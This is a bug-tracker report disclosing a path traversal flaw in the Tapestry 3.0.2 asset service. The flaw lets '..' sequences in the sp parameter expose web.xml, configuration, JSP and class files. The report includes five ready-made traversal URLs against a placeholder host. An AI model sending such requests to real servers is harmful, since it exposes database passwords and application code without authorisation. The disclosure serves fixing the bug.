Description
The asset service can be used to view files that should not be visible. This could expose important resources, including database passwords and connection information.
The asset service appears to expose any file relative to the classpath, and you can even use the ".." operator to go backwards, down into WEB-INF in general.
Here are some examples. They were tested on a demo application which is often available on the web, but they've been "cleaned," so they don't point to a real server anymore:
- View the web.xml file:
http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2Fweb.xml
- View the tapestry.application file:
http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2Ftapestry.application
- View a raw JSP file:
http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2F..%2F404.jsp
- Download a few class files that are part of the application:
http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2Forg%2Fappfuse%2Fweb%2FMessageFilter.class
http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2Forg%2Fappfuse%2Fweb%2FBaseEngine.class
Attachments
Issue Links
- is a clone of
-
TAPESTRY-278 Tapestry 3.0.2 asset service has security flaw
- Closed